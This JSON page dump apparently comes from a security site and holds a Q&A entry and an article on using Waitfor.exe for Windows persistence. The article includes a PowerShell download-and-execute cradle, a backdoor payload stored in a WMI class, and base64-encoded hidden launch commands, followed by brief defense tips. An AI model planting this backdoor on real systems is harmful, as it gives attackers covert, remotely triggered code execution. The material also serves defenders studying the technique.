[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCVBG-CyNUU17dmB_2Hr--1KfJxp3fvBljrpdsC-g6Mg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},280,"What is Waitfor.exe and how can it be used for persistence in penetration testing?","Waitfor.exe is a Windows command-line tool used to synchronize computers on a network by sending or waiting for signals. In penetration testing, it can be exploited as a backdoor: an attacker configures it to wait for a specific signal and then execute a command, such as launching a PowerShell script that downloads and runs payloads. For more details, refer to [Use Waitfor.exe to maintain persistence](\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence). This technique enables a remote activation mechanism, though the backdoor is non-reusable after one trigger unless a persistent loop is implemented.","\u003Cp>Waitfor.exe is a Windows command-line tool used to synchronize computers on a network by sending or waiting for signals. In penetration testing, it can be exploited as a backdoor: an attacker configures it to wait for a specific signal and then execute a command, such as launching a PowerShell script that downloads and runs payloads. For more details, refer to [Use Waitfor.exe to maintain persistence](\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence). This technique enables a remote activation mechanism, though the backdoor is non-reusable after one trigger unless a persistent loop is implemented.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-waitforexe-and-how-can-it-be-used-for-persistence-in-penetration-testing-1777484442349","Waitfor.exe, persistence, backdoor, penetration testing, signal",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},73,"Use Waitfor.exe to maintain persistence","use-waitfor-exe-to-maintain-persistence","Learn how to use Waitfor.exe for backdoor persistence in Windows. Explore exploitation techniques, POC details, and PowerShell integration for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>An idea obtained from Casey Smith‏@subTee's Twitter suggests that Waitfor.exe could potentially be used to implement a backdoor mechanism.\u003C\u002Fp>\u003Cp>Therefore, I conducted further research on it and developed a proof-of-concept (POC) for backdoor exploitation using PowerShell.\u003C\u002Fp>\u003Cp>This article will introduce the exploitation techniques of Waitfor.exe in penetration testing and share the ideas and details of developing the POC.\u003C\u002Fp>\u003Cp>The complete POC download link is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will specifically cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Waitfor.exe\u003C\u002Fli>\u003Cli>Exploitation ideas\u003C\u002Fli>\u003Cli>POC details\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Waitfor.exe\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Used to synchronize computers in a network, can send or wait for signals on the system\u003C\u002Fp>\u003Cp>\u003Cstrong>Supported systems:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Vista\u003C\u002Fli>\u003Cli>Windows XP\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows 7\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP2\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2000\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>Windows 8\u003C\u002Fli>\u003Cli>Windows 10\u003C\u002Fli>\u003Cli>Other Server systems not tested, theoretically supported\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Located in the System32 folder, started via command line\u003C\u002Fp>\u003Cp>Supported parameters as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018752102_0_279caba337.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Specific details are as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fs \u003Ccomputer>: Specifies the name or IP address of the destination computer to send to (backslashes cannot be used). If this parameter is omitted, the signal will be broadcast within the domain.\u003Cbr>\u003Cbr>\u002Fu [\u003Cdomain>\\]\u003Cuser>: Runs the script with the credentials of the specified user account. If this parameter is omitted, the current user's credentials are used.\u003Cbr>\u003Cbr>\u002Fp [\u003Cpassword>]: User password\u003Cbr>\u003Cbr>\u002Fsi: Indicates sending a signal for activation. If this parameter is omitted, it means waiting to receive a signal.\u003Cbr>\u003Cbr>\u002Ft \u003Ctimeout>: Specifies the number of seconds to wait for the signal. If this parameter is omitted, it waits indefinitely.\u003Cbr>\u003Cbr>\u003Csignalname>: Specified signal name, case-insensitive, length cannot exceed 225 characters\u003C\u002Fsignalname>\u003C\u002Ftimeout>\u003C\u002Fpassword>\u003C\u002Fuser>\u003C\u002Fdomain>\u003C\u002Fcomputer>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Computers can only receive signals if they are in the same domain as the computer sending the signal.\u003C\u002Fp>\u003Cp>That is, only hosts on the same network segment can receive signals.\u003C\u002Fp>\u003Cp>\u003Cstrong>Primary Purpose:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute commands simultaneously on hosts within the same network segment\u003C\u002Fp>\u003Ch3>Test Example:\u003C\u002Fh3>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor signalcalc &amp;&amp; calc.exe\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Signal Name: signalcalc\u003C\u002Fli>\u003Cli>Action after receiving signal: calc.exe, i.e., launch calculator\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, the waitfor.exe process exists in the background\u003C\u002Fp>\u003Cp>\u003Cstrong>Send Signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi signalcalc\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Target Computer: 127.0.0.1 (for local testing), replace with host IP for domain use\u003C\u002Fli>\u003Cli>\u002Fsi indicates sending a signal\u003C\u002Fli>\u003Cli>Signal name: signalcalc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Detailed operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018764469_1_4ba692e269.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more basic introduction, please refer to the official Microsoft documentation, link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc731613(v=ws.11).aspx\u003C\u002Fp>\u003Ch2>0x03 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the above basic introduction, the most intuitive understanding is that waitfor can be used as a backdoor\u003C\u002Fp>\u003Cp>Daniel Bohannon‏ @danielhbohannon shared his exploitation approach on Twitter: setting the operation after waitfor receives a signal to download and execute PowerShell code from a remote server\u003C\u002Fp>\u003Cp>Address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fdanielhbohannon\u002Fstatus\u002F872258924078092288\u003C\u002Fp>\u003Cp>Details as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018783010_2_eed993f03b.jpeg\">\u003C\u002Fp>\u003Cp>Additionally, he mentioned an interesting technique: if PowerShell code is set to execute with a delay, then after receiving the signal, there will be no waitfor.exe process running in the background.\u003C\u002Fp>\u003Cp>I verified this conclusion using the following method:\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor test1 &amp;&amp; &amp;&amp; powershell IEX (New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1')\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi test1\u003C\u002Fp>\u003Cp>The content of https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Start-Sleep -Seconds 10;\u003Cbr>start-process calc.exe;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After successfully receiving the signal, the waitfor.exe process exits.\u003C\u002Fp>\u003Cp>Then execute the PowerShell script, wait for 10 seconds before starting calc.exe.\u003C\u002Fp>\u003Cp>During these 10 seconds, only the powershell.exe process exists.\u003C\u002Fp>\u003Cp>In other words, if the waiting time is set longer, there will be no waitfor.exe process during that waiting period, reminding defenders to pay attention to this detail.\u003C\u002Fp>\u003Ch2>0x04 POC Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If used as a backdoor, the above exploitation method is not yet mature\u003C\u002Fp>\u003Cp>Because after triggering once, the process waitfor.exe will exit, making the backdoor non-reusable\u003C\u002Fp>\u003Cp>It is necessary to start a waiting mode again to trigger the backdoor once more\u003C\u002Fp>\u003Cp>Of course, a waiting mode can be manually started after each backdoor trigger\u003C\u002Fp>\u003Cp>But this is not intelligent enough. Can a script be used to automatically start the waiting mode, making it a sustainable backdoor?\u003C\u002Fp>\u003Cp>For this purpose, I wrote the following POC\u003C\u002Fp>\u003Ch3>Idea 1:\u003C\u002Fh3>\u003Cp>Save a PowerShell script named 1.ps1 on the target system\u003C\u002Fp>\u003Cp>The content of 1.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>start-process calc.exe\u003Cbr>cmd \u002Fc waitfor persist &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The escape character &amp; in PowerShell must be represented as `&amp;\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor persist1 &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist1\u003C\u002Fp>\u003Ch3>Approach 2:\u003C\u002Fh3>\u003Cp>Do not save files on the target system\u003C\u002Fp>\u003Cp>Here we use a technique previously introduced in 'WMI backdoor' to store the payload in a WMI class for reading and usage\u003C\u002Fp>\u003Cp>Store payload:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read payload:\u003C\u002Fp>\u003Cp>([WmiClass] 'Win32_Backdoor').Properties['Code'].Value\u003C\u002Fp>\u003Cp>The above operations are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018792403_3_2a4e2fc515.jpeg\">\u003C\u002Fp>\u003Cp>Execute payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Expression to execute commands is also possible; using iex is to shorten the length\u003C\u002Fp>\u003Cp>Combined with the parameter format of waitfor, here we choose to encode the code as base64\u003C\u002Fp>\u003Cp>Base64 encode the code for executing the payload, the following code is saved in code.txt:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 encode it, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The base64 encrypted code is as follows:\u003C\u002Fp>\u003Cp>JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>The above operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018803371_4_ebfc3b1ba6.jpeg\">\u003C\u002Fp>\u003Cp>Testing base64 encrypted code:\u003C\u002Fp>\u003Cp>powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>Code executed successfully, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018809918_5_f934d86d60.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above approach, the POC is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two layers of escape characters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>`` is used to represent `\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Actual test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018815834_6_eec2f052c8.jpeg\">\u003C\u002Fp>\u003Cp>There is a bug causing powershell.exe to fail to exit properly, leaving the process lingering in the background\u003C\u002Fp>\u003Cp>Therefore, a piece of code needs to be added to terminate the process powershell.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Based on the logical relationship, the code to terminate powershell.exe should be written before powershell -nop -W Hidden -E ...\u003C\u002Fp>\u003Cp>Finally, the complete POC code is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()| Out-Null\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; taskkill \u002Ff \u002Fim powershell.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() | Out-Null\u003Cbr>\u003Cbr>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Complete demonstration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018822287_7_3405375de8.png\">\u003C\u002Fp>\u003Cp>No residual process issues exist\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pay attention to the background process waitfor.exe\u003C\u002Fp>\u003Cp>For suspicious background processes cmd.exe and powershell.exe, you can use Process Explorer to view their startup parameters, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018827167_8_45b3c689da.jpeg\">\u003C\u002Fp>\u003Cp>You can also read the historical echo content from the above processes. Reference materials are as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fjblog.javelin-networks.com\u002Fblog\u002Fcli-powershell\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation approach of the Waitfor.exe backdoor, and there may be more exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>An idea obtained from Casey Smith‏@subTee's Twitter suggests that Waitfor.exe could potentially be used to implement a backdoor mechanism.\u003C\u002Fp>\u003Cp>Therefore, I conducted further research on it and developed a proof-of-concept (POC) for backdoor exploitation using PowerShell.\u003C\u002Fp>\u003Cp>This article will introduce the exploitation techniques of Waitfor.exe in penetration testing and share the ideas and details of developing the POC.\u003C\u002Fp>\u003Cp>The complete POC download link is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will specifically cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Waitfor.exe\u003C\u002Fli>\u003Cli>Exploitation ideas\u003C\u002Fli>\u003Cli>POC details\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Waitfor.exe\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Used to synchronize computers in a network, can send or wait for signals on the system\u003C\u002Fp>\u003Cp>\u003Cstrong>Supported systems:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Vista\u003C\u002Fli>\u003Cli>Windows XP\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows 7\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP2\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2000\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>Windows 8\u003C\u002Fli>\u003Cli>Windows 10\u003C\u002Fli>\u003Cli>Other Server systems not tested, theoretically supported\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Located in the System32 folder, started via command line\u003C\u002Fp>\u003Cp>Supported parameters as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018752102_0_279caba337-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Specific details are as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fs \u003Ccomputer>: Specifies the name or IP address of the destination computer to send to (backslashes cannot be used). If this parameter is omitted, the signal will be broadcast within the domain.\u003Cbr>\u003Cbr>\u002Fu [\u003Cdomain>\\]\u003Cuser>: Runs the script with the credentials of the specified user account. If this parameter is omitted, the current user's credentials are used.\u003Cbr>\u003Cbr>\u002Fp [\u003Cpassword>]: User password\u003Cbr>\u003Cbr>\u002Fsi: Indicates sending a signal for activation. If this parameter is omitted, it means waiting to receive a signal.\u003Cbr>\u003Cbr>\u002Ft \u003Ctimeout>: Specifies the number of seconds to wait for the signal. If this parameter is omitted, it waits indefinitely.\u003Cbr>\u003Cbr>\u003Csignalname>: Specified signal name, case-insensitive, length cannot exceed 225 characters\u003C\u002Fsignalname>\u003C\u002Ftimeout>\u003C\u002Fpassword>\u003C\u002Fuser>\u003C\u002Fdomain>\u003C\u002Fcomputer>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Computers can only receive signals if they are in the same domain as the computer sending the signal.\u003C\u002Fp>\u003Cp>That is, only hosts on the same network segment can receive signals.\u003C\u002Fp>\u003Cp>\u003Cstrong>Primary Purpose:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute commands simultaneously on hosts within the same network segment\u003C\u002Fp>\u003Ch3>Test Example:\u003C\u002Fh3>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor signalcalc &amp;&amp; calc.exe\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Signal Name: signalcalc\u003C\u002Fli>\u003Cli>Action after receiving signal: calc.exe, i.e., launch calculator\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, the waitfor.exe process exists in the background\u003C\u002Fp>\u003Cp>\u003Cstrong>Send Signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi signalcalc\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Target Computer: 127.0.0.1 (for local testing), replace with host IP for domain use\u003C\u002Fli>\u003Cli>\u002Fsi indicates sending a signal\u003C\u002Fli>\u003Cli>Signal name: signalcalc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Detailed operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018764469_1_4ba692e269-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more basic introduction, please refer to the official Microsoft documentation, link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc731613(v=ws.11).aspx\u003C\u002Fp>\u003Ch2>0x03 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the above basic introduction, the most intuitive understanding is that waitfor can be used as a backdoor\u003C\u002Fp>\u003Cp>Daniel Bohannon‏ @danielhbohannon shared his exploitation approach on Twitter: setting the operation after waitfor receives a signal to download and execute PowerShell code from a remote server\u003C\u002Fp>\u003Cp>Address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fdanielhbohannon\u002Fstatus\u002F872258924078092288\u003C\u002Fp>\u003Cp>Details as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018783010_2_eed993f03b-1.jpeg\">\u003C\u002Fp>\u003Cp>Additionally, he mentioned an interesting technique: if PowerShell code is set to execute with a delay, then after receiving the signal, there will be no waitfor.exe process running in the background.\u003C\u002Fp>\u003Cp>I verified this conclusion using the following method:\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor test1 &amp;&amp; &amp;&amp; powershell IEX (New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1')\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi test1\u003C\u002Fp>\u003Cp>The content of https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Start-Sleep -Seconds 10;\u003Cbr>start-process calc.exe;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After successfully receiving the signal, the waitfor.exe process exits.\u003C\u002Fp>\u003Cp>Then execute the PowerShell script, wait for 10 seconds before starting calc.exe.\u003C\u002Fp>\u003Cp>During these 10 seconds, only the powershell.exe process exists.\u003C\u002Fp>\u003Cp>In other words, if the waiting time is set longer, there will be no waitfor.exe process during that waiting period, reminding defenders to pay attention to this detail.\u003C\u002Fp>\u003Ch2>0x04 POC Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If used as a backdoor, the above exploitation method is not yet mature\u003C\u002Fp>\u003Cp>Because after triggering once, the process waitfor.exe will exit, making the backdoor non-reusable\u003C\u002Fp>\u003Cp>It is necessary to start a waiting mode again to trigger the backdoor once more\u003C\u002Fp>\u003Cp>Of course, a waiting mode can be manually started after each backdoor trigger\u003C\u002Fp>\u003Cp>But this is not intelligent enough. Can a script be used to automatically start the waiting mode, making it a sustainable backdoor?\u003C\u002Fp>\u003Cp>For this purpose, I wrote the following 